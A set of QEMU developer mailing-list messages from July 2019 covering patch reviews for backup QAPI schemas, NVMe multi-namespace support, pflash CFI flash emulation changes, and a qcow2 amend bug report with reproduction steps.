>> - NEVER: The bitmap is never synchronized against what was copied.
>> - ALWAYS: The bitmap is always synchronized, even on failures.
>> - CONDITIONAL: The bitmap is synchronized only on success.
>>
>> The existing incremental backup modes use 'conditional' semantics,
>> so add just that one for right now.
>>
>> Signed-off-by: John Snow 
>> ---
>>  qapi/block-core.json | 14 ++
>>  1 file changed, 14 insertions(+)
>>
>> diff --git a/qapi/block-core.json b/qapi/block-core.json
>> index 7b23efcf13..87eba5a5d9 100644
>> --- a/qapi/block-core.json
>> +++ b/qapi/block-core.json
>> @@ -1134,6 +1134,20 @@
>>  { 'enum': 'MirrorSyncMode',
>>'data': ['top', 'full', 'none', 'incremental'] }
>>  
>> +##
>> +# @BitmapSyncMode:
>> +#
>> +# An enumeration of possible behaviors for the synchronization of a bitmap
>> +# when used for data copy operations.
>> +#
>> +# @conditional: The bitmap is only synced when the operation is successful.
>> +#   This is the behavior always used for 'INCREMENTAL' backups.
>> +#
>> +# Since: 4.2
>> +##
>> +{ 'enum': 'BitmapSyncMode',
>> +  'data': ['conditional'] }
>> +
>>  ##
>>  # @MirrorCopyMode:
>>  #
> 
> The name "conditional" makes me go "on what?".  What about "on-success"?
> 

Good point. I do like that more.



Re: [Qemu-block] [Qemu-devel] [PATCH v2 01/18] qapi/block-core: Introduce BackupCommon

2019-07-05 Thread John Snow



On 7/5/19 10:14 AM, Markus Armbruster wrote:
> John Snow  writes:
> 
>> drive-backup and blockdev-backup have an awful lot of things in common
>> that are the same. Let's fix that.
>>
>> I don't deduplicate 'target', because the semantics actually did change
>> between each structure. Leave that one alone so it can be documented
>> separately.
>>
>> Signed-off-by: John Snow 
>> ---
>>  qapi/block-core.json | 103 ++-
>>  1 file changed, 33 insertions(+), 70 deletions(-)
>>
>> diff --git a/qapi/block-core.json b/qapi/block-core.json
>> index 0d43d4f37c..7b23efcf13 100644
>> --- a/qapi/block-core.json
>> +++ b/qapi/block-core.json
>> @@ -1315,32 +1315,23 @@
>>'data': { 'node': 'str', 'overlay': 'str' } }
>>  
>>  ##
>> -# @DriveBackup:
>> +# @BackupCommon:
>>  #
>>  # @job-id: identifier for the newly-created block job. If
>>  #  omitted, the device name will be used. (Since 2.7)
>>  #
>>  # @device: the device name or node-name of a root node which should be 
>> copied.
>>  #
>> -# @target: the target of the new image. If the file exists, or if it
>> -#  is a device, the existing file/device will be used as the new
>> -#  destination.  If it does not exist, a new file will be created.
>> -#
>> -# @format: the format of the new destination, default is to
>> -#  probe if @mode is 'existing', else the format of the source
>> -#
>>  # @sync: what parts of the disk image should be copied to the destination
>>  #(all the disk, only the sectors allocated in the topmost image, 
>> from a
>>  #dirty bitmap, or only new I/O).
> 
> This is DriveBackup's wording.  Blockdev lacks "from a dirty bitmap, ".
> Is this a doc fix?
> 

Yes.

>>  #
>> -# @mode: whether and how QEMU should create a new image, default is
>> -#'absolute-paths'.
>> -#
>> -# @speed: the maximum speed, in bytes per second
>> +# @speed: the maximum speed, in bytes per second. The default is 0,
>> +# for unlimited.
> 
> This is Blockdev's wording.  DriveBackup lacks "the default is 0, for
> unlimited."  Is this a doc fix?
> 

Yes.

>>  #
>>  # @bitmap: the name of dirty bitmap if sync is "incremental".
>>  #  Must be present if sync is "incremental", must NOT be present
>> -#  otherwise. (Since 2.4)
>> +#  otherwise. (Since 2.4 (Drive), 3.1 (Blockdev))
> 
> I second Max's request to say (drive-backup) and (blockdev-backup),
> strongly.
> 

OK.

>>  #
>>  # @compress: true to compress data, if the target format supports it.
>>  #(default: false) (since 2.8)
>> @@ -1372,73 +1363,45 @@
>>  #
>>  # Since: 1.6
> 
> BackupCommon is actually since 4.2.
> 
> The type doesn't appear in the external interface (only its extensions
> DriveBackup and BlockdevBackup do), so documenting "since" is actually
> pointless.  However, we blindly document "since" for *everything*,
> simply because we don't want to waste time on deciding whether we have
> to.
> 

Ah, sure.

>>  ##
>> +{ 'struct': 'BackupCommon',
>> +  'data': { '*job-id': 'str', 'device': 'str',
>> +'sync': 'MirrorSyncMode', '*speed': 'int',
>> +'*bitmap': 'str', '*compress': 'bool',
>> +'*on-source-error': 'BlockdevOnError',
>> +'*on-target-error': 'BlockdevOnError',
>> +'*auto-finalize': 'bool', '*auto-dismiss': 'bool' } }
>> +
>> +##
>> +# @DriveBackup:
>> +#
>> +# @target: the target of the new image. If the file exists, or if it
>> +#  is a device, the existing file/device will be used as the new
>> +#  destination.  If it does not exist, a new file will be created.
>> +#
>> +# @format: the format of the new destination, default is to
>> +#  probe if @mode is 'existing', else the format of the source
>> +#
>> +# @mode: whether and how QEMU should create a new image, default is
>> +#'absolute-paths'.
>> +#
>> +# Since: 1.6
>> +##
>>  { 'struct': 'DriveBackup',
>> -  'data': { '*job-id': 'str', 'device': 'str', 'target': 'str',
>> -'*format': 'str', 'sync': 'MirrorSyncMode',
>> -'*mode': 'NewImageMode', '*speed': 'int',
>> -'*bitmap': 'str', '*compress': 'bool',
>> -'*on-source-error': 'BlockdevOnError',
>> -'*on-target-error': 'BlockdevOnError',
>> -'*auto-finalize': 'bool', '*auto-dismiss': 'bool' } }
>> +  'base': 'BackupCommon',
>> +  'data': { 'target': 'str',
>> +'*format': 'str',
>> +'*mode': 'NewImageMode' } }
>>  
>>  ##
>>  # @BlockdevBackup:
>>  #
>> -# @job-id: identifier for the newly-created block job. If
>> -#  omitted, the device name will be used. (Since 2.7)
>> -#
>> -# @device: the device name or node-name of a root node which should be 
>> copied.
>> -#
>>  # @target: the device name or node-name of the backup target node.
>>  #
>> -# @sync: what parts of the disk image should be copied to the destination
>> -#(all the disk, only the sectors 

Re: [Qemu-block] [Qemu-devel] [PATCH 16/16] nvme: support multiple namespaces

2019-07-05 Thread Daniel P . Berrangé
On Fri, Jul 05, 2019 at 06:20:14PM +0200, Klaus Birkelund wrote:
> On Fri, Jul 05, 2019 at 02:49:29PM +0100, Daniel P. Berrangé wrote:
> > On Fri, Jul 05, 2019 at 03:36:17PM +0200, Klaus Birkelund wrote:
> > > On Fri, Jul 05, 2019 at 09:23:33AM +0200, Klaus Birkelund Jensen wrote:
> > > > This adds support for multiple namespaces by introducing a new 'nvme-ns'
> > > > device model. The nvme device creates a bus named from the device name
> > > > ('id'). The nvme-ns devices then connect to this and registers
> > > > themselves with the nvme device.
> > > > 
> > > > This changes how an nvme device is created. Example with two namespaces:
> > > > 
> > > >   -drive file=nvme0n1.img,if=none,id=disk1
> > > >   -drive file=nvme0n2.img,if=none,id=disk2
> > > >   -device nvme,serial=deadbeef,id=nvme0
> > > >   -device nvme-ns,drive=disk1,bus=nvme0,nsid=1
> > > >   -device nvme-ns,drive=disk2,bus=nvme0,nsid=2
> > > > 
> > > > A maximum of 256 namespaces can be configured.
> > > > 
> > >  
> > > Well that was embarrassing.
> > > 
> > > This patch breaks nvme-test.c. Which I obviously did not run.
> > > 
> > > In my defense, the test doesn't do much currently, but I'll of course
> > > fix the test for v2.
> > 
> > That highlights a more serious problem.  This series changes the syntax
> > for configuring the nvme device in a way that is not backwards compatible.
> > So anyone who is using QEMU with NVME will be broken when they upgrade
> > to the next QEMU release.
> > 
> > I understand why you wanted to restructure things to have a separate
> > nvme-ns device, but there needs to be some backcompat support in there
> > for the existing syntax to avoid breaking current users IMHO.
> > 
>  
> Hi Daniel,
> 
> I raised this issue previously. I suggested that we keep the drive
> property for the nvme device and only accept either that or an nvme-ns
> device to be configured (but not both).
> 
> That would keep backward compatibility, but enforce the use of nvme-ns
> for any setup that requires multiple namespaces.
> 
> Would that work?

Yes, that would be viable, as an existing CLI arg usage would continue
to be supported as before.

We could also list the back compat syntax as a deprecation in the docs
(qemu-deprecated.texi) so that in a few releases in the future, we can
drop the old syntax and then use nvme-ns exclusively thereafter.

Regards,
Daniel
-- 
|: https://berrange.com  -o-https://www.flickr.com/photos/dberrange :|
|: https://libvirt.org -o-https://fstop138.berrange.com :|
|: https://entangle-photo.org-o-https://www.instagram.com/dberrange :|



Re: [Qemu-block] [Qemu-devel] [PATCH 16/16] nvme: support multiple namespaces

2019-07-05 Thread Klaus Birkelund
On Fri, Jul 05, 2019 at 02:49:29PM +0100, Daniel P. Berrangé wrote:
> On Fri, Jul 05, 2019 at 03:36:17PM +0200, Klaus Birkelund wrote:
> > On Fri, Jul 05, 2019 at 09:23:33AM +0200, Klaus Birkelund Jensen wrote:
> > > This adds support for multiple namespaces by introducing a new 'nvme-ns'
> > > device model. The nvme device creates a bus named from the device name
> > > ('id'). The nvme-ns devices then connect to this and register
> > > themselves with the nvme device.
> > > 
> > > This changes how an nvme device is created. Example with two namespaces:
> > > 
> > >   -drive file=nvme0n1.img,if=none,id=disk1
> > >   -drive file=nvme0n2.img,if=none,id=disk2
> > >   -device nvme,serial=deadbeef,id=nvme0
> > >   -device nvme-ns,drive=disk1,bus=nvme0,nsid=1
> > >   -device nvme-ns,drive=disk2,bus=nvme0,nsid=2
> > > 
> > > A maximum of 256 namespaces can be configured.
> > > 
> >  
> > Well that was embarrassing.
> > 
> > This patch breaks nvme-test.c. Which I obviously did not run.
> > 
> > In my defense, the test doesn't do much currently, but I'll of course
> > fix the test for v2.
> 
> That highlights a more serious problem.  This series changes the syntax
> for configuring the nvme device in a way that is not backwards compatible.
> So anyone who is using QEMU with NVME will be broken when they upgrade
> to the next QEMU release.
> 
> I understand why you wanted to restructure things to have a separate
> nvme-ns device, but there needs to be some backcompat support in there
> for the existing syntax to avoid breaking current users IMHO.
> 
 
Hi Daniel,

I raised this issue previously. I suggested that we keep the drive
property for the nvme device and only accept either that or an nvme-ns
device to be configured (but not both).

That would keep backward compatibility, but enforce the use of nvme-ns
for any setup that requires multiple namespaces.

Would that work?
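
Roughly, the rule could look like this (a sketch only -- the struct and
field names are assumptions, not the actual nvme device code):

    static void nvme_check_ns_config(NvmeCtrl *n, Error **errp)
    {
        bool legacy_drive = n->conf.blk != NULL;      /* -device nvme,drive=... */
        bool has_ns_devices = n->num_namespaces > 0;  /* nvme-ns on the bus */

        if (legacy_drive && has_ns_devices) {
            error_setg(errp, "'drive' cannot be combined with nvme-ns devices");
        }
    }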

Cheers,
Klaus



[Qemu-block] [PATCH-for-4.1] Revert "hw/block/pflash_cfi02: Reduce I/O accesses to 16-bit"

2019-07-05 Thread Philippe Mathieu-Daudé
Stephen Checkoway noticed commit 3ae0343db69 is incorrect.
This commit states that all parallel flashes are limited to 16-bit
accesses; however, the x32 configuration exists in some models,
such as the Cypress S29CL032J, whose CFI Device Geometry Definition
announces:

  CFI ADDR DATA
  0x28,0x29 = 0x0003 (x32-only asynchronous interface)

Guests should not be affected by the previous change, because
QEMU does not announce itself as x32 capable:

/* Flash device interface (8 & 16 bits) */
pfl->cfi_table[0x28] = 0x02;
pfl->cfi_table[0x29] = 0x00;

Commit 3ae0343db69 does not restrict the bus to 16-bit accesses,
but restricts the implementation to at most 16-bit accesses, so a guest
32-bit access will result in two 16-bit calls.

Now, we have 2 boards that register the flash device with 32-bit
access:

- PPC: taihu_405ep

  The CFI id matches the S29AL008J, which is 1MB in x16, while
  the QEMU code forces it to be 2MB, and Linux expects
  a 4MB flash.

- ARM: Digic4

  While the comment says "Samsung K8P3215UQB 64M Bit (4Mx16)",
  this flash is 32Mb (2MB). Also note the CFI id does not match
  the comment.

To avoid unexpected side effects, we revert commit 3ae0343db69,
and will clean the board code later.

Reported-by: Stephen Checkoway 
Signed-off-by: Philippe Mathieu-Daudé 
---
 hw/block/pflash_cfi02.c | 5 -
 1 file changed, 4 insertions(+), 1 deletion(-)

diff --git a/hw/block/pflash_cfi02.c b/hw/block/pflash_cfi02.c
index 5392290c72..83084b9d72 100644
--- a/hw/block/pflash_cfi02.c
+++ b/hw/block/pflash_cfi02.c
@@ -317,6 +317,8 @@ static uint64_t pflash_read(void *opaque, hwaddr offset, 
unsigned int width)
 boff = offset & 0xFF;
 if (pfl->width == 2) {
 boff = boff >> 1;
+} else if (pfl->width == 4) {
+boff = boff >> 2;
 }
 switch (pfl->cmd) {
 default:
@@ -447,6 +449,8 @@ static void pflash_write(void *opaque, hwaddr offset, 
uint64_t value,
 boff = offset;
 if (pfl->width == 2) {
 boff = boff >> 1;
+} else if (pfl->width == 4) {
+boff = boff >> 2;
 }
 /* Only the least-significant 11 bits are used in most cases. */
 boff &= 0x7FF;
@@ -706,7 +710,6 @@ static void pflash_write(void *opaque, hwaddr offset, 
uint64_t value,
 static const MemoryRegionOps pflash_cfi02_ops = {
 .read = pflash_read,
 .write = pflash_write,
-.impl.max_access_size = 2,
 .valid.min_access_size = 1,
 .valid.max_access_size = 4,
 .endianness = DEVICE_NATIVE_ENDIAN,
-- 
2.20.1




Re: [Qemu-block] [Qemu-devel] [PATCH for-4.1] qcow2: Allow -o compat=v3 during qemu-img amend

2019-07-05 Thread Eric Blake
On 7/5/19 10:53 AM, Eric Blake wrote:
> On 7/5/19 10:28 AM, Eric Blake wrote:
>> Commit b76b4f60 allowed '-o compat=v3' as an alias for the
>> less-appealing '-o compat=1.1' for 'qemu-img create' since we want to
>> use the QMP form as much as possible, but forgot to do likewise for
>> qemu-img amend.  Also, it doesn't help that '-o help' doesn't list our
>> new preferred spellings.
>>
>> Signed-off-by: Eric Blake 
>> ---
>>
>> I'm arguing that the lack of consistency is a bug, even though the bug
>> has been present since 2.12.
> 
> I found this bug while chasing down another one: trying to see if we can
> now lift our restriction against 'qemu-img resize' on an image with
> internal snapshots.  For v3 images, the limitation is artificial (the
> spec says every snapshot is required to have an associated size, so you
> know what size to change back to when reverting to that snapshot); but
> for v2 the limitation is real (the spec did not require tracking image
> size, and therefore changing the size meant that you might not be able
> to safely revert).  Except that we ALSO have a bug in qemu-img amend:
> 
> 1. Create a v2 file with internal snapshot. On CentOS 6:
> $ qemu-img create -f qcow2 file 1m
> $ qemu-img snapshot -c s1 file
> 2. Check that the internal snapshot header uses the smaller size:
> $ od -Ax -j64 -N8 -tx1 file  # Learn the offset for the next command
> $ offset=$((0x5+36))
> $ od -Ax -j$offset -N 4 -tx1 file
>  => extra field is 0
> 3. Upgrade it to v3. Using qemu.git master:
> $ qemu-img amend -o compat=1.1 file
> 4. Check the internal snapshot header size:
> $ od -Ax -j64 -N8 -tx1 file  # Learn the offset for the next command
> $ offset=$((0x5+36))
> $ od -Ax -j$offset -N 4 -tx1 file
>  => oops - extra field is still 0, but should now be at least 16.
> 


Oh, and 'qemu-img check file' fails to diagnose the v3 image as
violating the qcow2 spec.
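
For reference, the reason the extra data size must be at least 16 for v3:
the spec requires each snapshot's extra data to start with two 64-bit
fields, roughly (struct name is illustrative, not QEMU's actual definition):

    typedef struct QEMU_PACKED QCow2SnapshotExtra {
        uint64_t vm_state_size_large; /* VM state size, big-endian on disk */
        uint64_t virtual_disk_size;   /* guest disk size when snapshot taken */
    } QCow2SnapshotExtra;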

-- 
Eric Blake, Principal Software Engineer
Red Hat, Inc.   +1-919-301-3226
Virtualization:  qemu.org | libvirt.org





Re: [Qemu-block] [Qemu-devel] [PATCH for-4.1] qcow2: Allow -o compat=v3 during qemu-img amend

2019-07-05 Thread Eric Blake
On 7/5/19 10:28 AM, Eric Blake wrote:
> Commit b76b4f60 allowed '-o compat=v3' as an alias for the
> less-appealing '-o compat=1.1' for 'qemu-img create' since we want to
> use the QMP form as much as possible, but forgot to do likewise for
> qemu-img amend.  Also, it doesn't help that '-o help' doesn't list our
> new preferred spellings.
> 
> Signed-off-by: Eric Blake 
> ---
> 
> I'm arguing that the lack of consistency is a bug, even though the bug
> has been present since 2.12.

I found this bug while chasing down another one: trying to see if we can
now lift our restriction against 'qemu-img resize' on an image with
internal snapshots.  For v3 images, the limitation is artificial (the
spec says every snapshot is required to have an associated size, so you
know what size to change back to when reverting to that snapshot); but
for v2 the limitation is real (the spec did not require tracking image
size, and therefore changing the size meant that you might not be able
to safely revert).  Except that we ALSO have a bug in qemu-img amend:

1. Create a v2 file with internal snapshot. On CentOS 6:
$ qemu-img create -f qcow2 file 1m
$ qemu-img snapshot -c s1 file
2. Check that the internal snapshot header uses the smaller size:
$ od -Ax -j64 -N8 -tx1 file  # Learn the offset for the next command
$ offset=$((0x5+36))
$ od -Ax -j$offset -N 4 -tx1 file
 => extra field is 0
3. Upgrade it to v3. Using qemu.git master:
$ qemu-img amend -o compat=1.1 file
4. Check the internal snapshot header size:
$ od -Ax -j64 -N8 -tx1 file  # Learn the offset for the next command
$ offset=$((0x5+36))
$ od -Ax -j$offset -N 4 -tx1 file
 => oops - extra field is still 0, but should now be at least 16.

-- 
Eric Blake, Principal Software Engineer
Red Hat, Inc.   +1-919-301-3226
Virtualization:  qemu.org | libvirt.org





[Qemu-block] [PATCH v3 9/9] hw/block/pflash_cfi01: Hold the PRI table offset in a variable

2019-07-05 Thread Philippe Mathieu-Daudé
Manufacturers are allowed to move the PRI table; this is why its
offset is queryable via the fixed offsets 0x15/0x16.
Add a variable to hold the offset, so it will be easier to later
move the PRI table.
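
For illustration, a guest locates the PRI table by reading these two bytes
(cfi_query_read() is a made-up helper returning one byte of the CFI query
space, not a real API):

    uint16_t pri_ofs = cfi_query_read(0x15) | (cfi_query_read(0x16) << 8);
    /* 0x31 in this model, but manufacturers may place the table elsewhere */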

Reviewed-by: Alistair Francis 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
 hw/block/pflash_cfi01.c | 41 ++---
 1 file changed, 26 insertions(+), 15 deletions(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index ab72af22a7..67e714b32d 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -761,6 +761,7 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 }
 
 /* Hardcoded CFI table */
+const uint16_t pri_ofs = 0x31;
 /* Standard "QRY" string */
 pfl->cfi_table[0x10] = 'Q';
 pfl->cfi_table[0x11] = 'R';
@@ -769,14 +770,17 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 pfl->cfi_table[0x13] = 0x01;
 pfl->cfi_table[0x14] = 0x00;
 /* Primary extended table address (none) */
-pfl->cfi_table[0x15] = 0x31;
-pfl->cfi_table[0x16] = 0x00;
+pfl->cfi_table[0x15] = pri_ofs;
+pfl->cfi_table[0x16] = pri_ofs >> 8;
 /* Alternate command set (none) */
 pfl->cfi_table[0x17] = 0x00;
 pfl->cfi_table[0x18] = 0x00;
 /* Alternate extended table (none) */
 pfl->cfi_table[0x19] = 0x00;
 pfl->cfi_table[0x1A] = 0x00;
+
+/* CFI: System Interface Information */
+
 /* Vcc min */
 pfl->cfi_table[0x1B] = 0x45;
 /* Vcc max */
@@ -801,6 +805,9 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 pfl->cfi_table[0x25] = 0x04;
 /* Max timeout for chip erase */
 pfl->cfi_table[0x26] = 0x00;
+
+/* CFI: Device Geometry Definition */
+
 /* Device size */
 pfl->cfi_table[0x27] = ctz32(device_len); /* + 1; */
 /* Flash device interface (8 & 16 bits) */
@@ -825,26 +832,30 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 pfl->cfi_table[0x2E] = (blocks_per_device - 1) >> 8;
 pfl->cfi_table[0x2F] = sector_len_per_device >> 8;
 pfl->cfi_table[0x30] = sector_len_per_device >> 16;
+assert(0x30 < pri_ofs);
+
+/* CFI: Primary-Vendor Specific */
 
 /* Extended */
-pfl->cfi_table[0x31] = 'P';
-pfl->cfi_table[0x32] = 'R';
-pfl->cfi_table[0x33] = 'I';
+pfl->cfi_table[0x00 + pri_ofs] = 'P';
+pfl->cfi_table[0x01 + pri_ofs] = 'R';
+pfl->cfi_table[0x02 + pri_ofs] = 'I';
 
-pfl->cfi_table[0x34] = '1';
-pfl->cfi_table[0x35] = '0';
+pfl->cfi_table[0x03 + pri_ofs] = '1';
+pfl->cfi_table[0x04 + pri_ofs] = '0';
 
-pfl->cfi_table[0x36] = 0x00;
-pfl->cfi_table[0x37] = 0x00;
-pfl->cfi_table[0x38] = 0x00;
-pfl->cfi_table[0x39] = 0x00;
+pfl->cfi_table[0x05 + pri_ofs] = 0x00; /* Optional features */
+pfl->cfi_table[0x06 + pri_ofs] = 0x00;
+pfl->cfi_table[0x07 + pri_ofs] = 0x00;
+pfl->cfi_table[0x08 + pri_ofs] = 0x00;
 
-pfl->cfi_table[0x3a] = 0x00;
+pfl->cfi_table[0x09 + pri_ofs] = 0x00; /* Func. supported after suspend */
 
-pfl->cfi_table[0x3b] = 0x00;
-pfl->cfi_table[0x3c] = 0x00;
+pfl->cfi_table[0x0a + pri_ofs] = 0x00; /* Block status register mask */
+pfl->cfi_table[0x0b + pri_ofs] = 0x00;
 
-pfl->cfi_table[0x3f] = 0x01; /* Number of protection fields */
+pfl->cfi_table[0x0e + pri_ofs] = 0x01; /* Number of protection fields */
+assert(0x0e + pri_ofs < ARRAY_SIZE(pfl->cfi_table));
 }
 
 static void pflash_cfi01_system_reset(DeviceState *dev)
-- 
2.20.1




[Qemu-block] [PATCH v3 8/9] hw/block/pflash_cfi01: Replace DPRINTF by qemu_log_mask(GUEST_ERROR)

2019-07-05 Thread Philippe Mathieu-Daudé
Reviewed-by: Alistair Francis 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
 hw/block/pflash_cfi01.c | 8 ++--
 1 file changed, 6 insertions(+), 2 deletions(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index ba00e52923..ab72af22a7 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -283,7 +283,9 @@ static uint32_t pflash_read(PFlashCFI01 *pfl, hwaddr offset,
 switch (pfl->cmd) {
 default:
 /* This should never happen : reset state & treat it as a read */
-DPRINTF("%s: unknown command state: %x\n", __func__, pfl->cmd);
+qemu_log_mask(LOG_GUEST_ERROR, "%s: Invalid state, "
+  "wcycle %d cmd 0x02%x\n",
+  __func__, pfl->wcycle, pfl->cmd);
 pfl->wcycle = 0;
 pfl->cmd = 0xff;
 /* fall through to read code */
@@ -630,7 +632,9 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 break;
 default:
 /* Should never happen */
-DPRINTF("%s: invalid write state\n",  __func__);
+qemu_log_mask(LOG_GUEST_ERROR, "%s: Invalid state, "
+  "wcycle %d cmd (0x02%x -> value 0x02%x)\n",
+  __func__, pfl->wcycle, pfl->cmd, value);
 goto mode_read_array;
 }
 return;
-- 
2.20.1




[Qemu-block] [PATCH v3 7/9] hw/block/pflash_cfi01: Improve command comments

2019-07-05 Thread Philippe Mathieu-Daudé
Reviewed-by: Alistair Francis 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
 hw/block/pflash_cfi01.c | 16 
 1 file changed, 8 insertions(+), 8 deletions(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index e097d9260d..ba00e52923 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -208,11 +208,11 @@ static uint32_t pflash_devid_query(PFlashCFI01 *pfl, 
hwaddr offset)
  * Offsets 2/3 are block lock status, is not emulated.
  */
 switch (boff & 0xFF) {
-case 0:
+case 0: /* Manufacturer ID */
 resp = pfl->ident0;
 trace_pflash_manufacturer_id(resp);
 break;
-case 1:
+case 1: /* Device ID */
 resp = pfl->ident1;
 trace_pflash_device_id(resp);
 break;
@@ -455,11 +455,11 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 case 0:
 /* read mode */
 switch (cmd) {
-case 0x10: /* Single Byte Program */
-case 0x40: /* Single Byte Program */
+case 0x10: /* Single Byte Program (setup) */
+case 0x40: /* Single Byte Program (setup) [Intel] */
 DPRINTF("%s: Single Byte Program\n", __func__);
 break;
-case 0x20: /* Block erase */
+case 0x20: /* Block erase (setup) */
 p = pfl->storage;
 offset &= ~(pfl->sector_len - 1);
 
@@ -515,8 +515,8 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 break;
 case 1:
 switch (pfl->cmd) {
-case 0x10: /* Single Byte Program */
-case 0x40: /* Single Byte Program */
+case 0x10: /* Single Byte Program (confirm) */
+case 0x40: /* Single Byte Program (confirm) [Intel] */
 DPRINTF("%s: Single Byte Program\n", __func__);
 if (!pfl->ro) {
 pflash_data_write(pfl, offset, value, width, be);
@@ -527,7 +527,7 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 pfl->status |= 0x80; /* Ready! */
 pfl->wcycle = 0;
 break;
-case 0x20: /* Block erase */
+case 0x20: /* Block erase (confirm) */
 case 0x28:
 if (cmd == 0xd0) { /* confirm */
 pfl->wcycle = 0;
-- 
2.20.1




[Qemu-block] [PATCH v3 6/9] hw/block/pflash_cfi01: Simplify CFI_QUERY processing

2019-07-05 Thread Philippe Mathieu-Daudé
The current code does:

if (write_cycle == 0)
  if (command == CFI_QUERY)
    break
  write_cycle += 1
  last_command = command

if (write_cycle == 1)
  if (last_command == CFI_QUERY)
    if (command == READ_ARRAY)
      write_cycle = 0
      last_command = READ_ARRAY

Simplify by not increasing the write_cycle on CFI_QUERY;
the next commands are then processed as normal wcycle=0 commands.

This matches the hardware datasheet (we do not enter the WRITE
state machine, thus no write cycle involved).

Reviewed-by: Alistair Francis 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
 hw/block/pflash_cfi01.c | 10 ++
 1 file changed, 2 insertions(+), 8 deletions(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index c32c67d01d..e097d9260d 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -491,7 +491,8 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 return;
 case 0x98: /* CFI query */
 DPRINTF("%s: CFI query\n", __func__);
-break;
+pfl->cmd = cmd;
+return;
 case 0xe8: /* Write to buffer */
 DPRINTF("%s: Write to buffer\n", __func__);
 /* FIXME should save @offset, @width for case 1+ */
@@ -565,13 +566,6 @@ static void pflash_write(PFlashCFI01 *pfl, hwaddr offset,
 goto mode_read_array;
 }
 break;
-case 0x98:
-if (cmd == 0xff) {
-goto mode_read_array;
-} else {
-DPRINTF("%s: leaving query mode\n", __func__);
-}
-break;
 default:
 goto error_flash;
 }
-- 
2.20.1




[Qemu-block] [PATCH v3 5/9] hw/block/pflash_cfi01: Add the DeviceReset() handler

2019-07-05 Thread Philippe Mathieu-Daudé
A "system reset" sets the device state machine in READ_ARRAY mode
and, after some delay, sets the SR.7 READY bit.

We do not model timings, so we set the SR.7 bit directly.

The TYPE_DEVICE interface provides a DeviceReset handler.
This pflash device is a subclass of TYPE_SYS_BUS_DEVICE (which
is a subclass of TYPE_DEVICE).
SYS_BUS devices are automatically plugged into the 'main system
bus', which is the root of the qbus tree.
Devices in the qbus tree are guaranteed to have their reset()
handler called after realize() and before we try to run the guest.

To avoid incoherent states when the machine resets (see bug report
below), factor out the reset code into pflash_cfi01_system_reset,
and register the method as a device reset callback.

Buglink: https://bugzilla.redhat.com/show_bug.cgi?id=1678713
Reported-by: Laszlo Ersek 
Reviewed-by: John Snow 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
v3: reword description
---
 hw/block/pflash_cfi01.c | 15 +--
 1 file changed, 13 insertions(+), 2 deletions(-)

diff --git a/hw/block/pflash_cfi01.c b/hw/block/pflash_cfi01.c
index 200bfd0ab8..c32c67d01d 100644
--- a/hw/block/pflash_cfi01.c
+++ b/hw/block/pflash_cfi01.c
@@ -762,8 +762,6 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 pfl->max_device_width = pfl->device_width;
 }
 
-pflash_mode_read_array(pfl);
-pfl->status = 0x80; /* WSM ready */
 /* Hardcoded CFI table */
 /* Standard "QRY" string */
 pfl->cfi_table[0x10] = 'Q';
@@ -851,6 +849,18 @@ static void pflash_cfi01_realize(DeviceState *dev, Error 
**errp)
 pfl->cfi_table[0x3f] = 0x01; /* Number of protection fields */
 }
 
+static void pflash_cfi01_system_reset(DeviceState *dev)
+{
+PFlashCFI01 *pfl = PFLASH_CFI01(dev);
+
+pflash_mode_read_array(pfl);
+/*
+ * The WSM ready timer occurs at most 150ns after system reset.
+ * This model deliberately ignores this delay.
+ */
+pfl->status = 0x80;
+}
+
 static Property pflash_cfi01_properties[] = {
 DEFINE_PROP_DRIVE("drive", PFlashCFI01, blk),
 /* num-blocks is the number of blocks actually visible to the guest,
@@ -895,6 +905,7 @@ static void pflash_cfi01_class_init(ObjectClass *klass, 
void *data)
 {
 DeviceClass *dc = DEVICE_CLASS(klass);
 
+dc->reset = pflash_cfi01_system_reset;
 dc->realize = pflash_cfi01_realize;
 dc->props = pflash_cfi01_properties;
 dc->vmsd = &vmstate_pflash;
-- 
2.20.1




[Qemu-block] [PATCH v3 3/9] hw/block/pflash_cfi01: Extract pflash_mode_read_array()

2019-07-05 Thread Philippe Mathieu-Daudé
The same pattern is used when setting the flash in READ_ARRAY mode:
- Set the state machine command to READ_ARRAY
- Reset the write_cycle counter
- Reset the memory region in ROMD

Refactor the current code by extracting this pattern.
It is used twice:
- On a write access (on command failure, error, or explicitly asked)
- When the device is initialized. Here the ROMD mode is hidden
  by the memory_region_init_rom_device() call.

Rename the 'reset_flash' label as 'mode_read_array' to make explicit that we
do not reset the device; we simply set its internal state machine
to the READ_ARRAY mode. We do not reset the status register error
bits, as a device reset would do.

Reviewed-by: John Snow 
Reviewed-by: Alistair Francis 
Regression-tested-by: Laszlo Ersek 
Signed-off-by: Philippe Mathieu-Daudé 
---
 hw/block/pflash_cfi01.c | 36 
 hw/block/trace-events   |  1 +
